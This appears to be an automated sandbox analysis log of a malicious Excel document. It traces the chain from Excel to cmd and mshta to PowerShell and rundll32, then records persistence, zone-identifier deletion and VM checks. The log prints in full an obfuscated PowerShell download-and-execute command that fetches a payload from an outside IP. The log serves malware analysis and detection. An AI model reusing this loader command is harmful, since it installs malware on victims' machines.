Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K......h.^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................DX.k....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................DX.k..... ..............................}..v............0...............h.^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................$X.k....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................$X.k....H.^.............................}..v....h.......0.................^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............tY.k....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............tY.k......^.............................}..v............0...............x.^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................A.k....E...............................}..v............0...............H.^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+................A.k....E...............................}..v....@.......0...............H.^.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............X.......:.......................
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD142.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A5988 CreateToolhelp32Snapshot, 17_2_002A5988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: 32E3.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E08CF push 8B4902A5h; iretd 4_3_031E08D4
Source: C:\Windows\System32\mshta.exe Code function: 4_3_031E00BB push 8B4902A5h; iretd 4_3_031E00C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8e522

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 1992 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 0000000A.00000002.529168355.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000F.00000002.608665312.00000000004CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
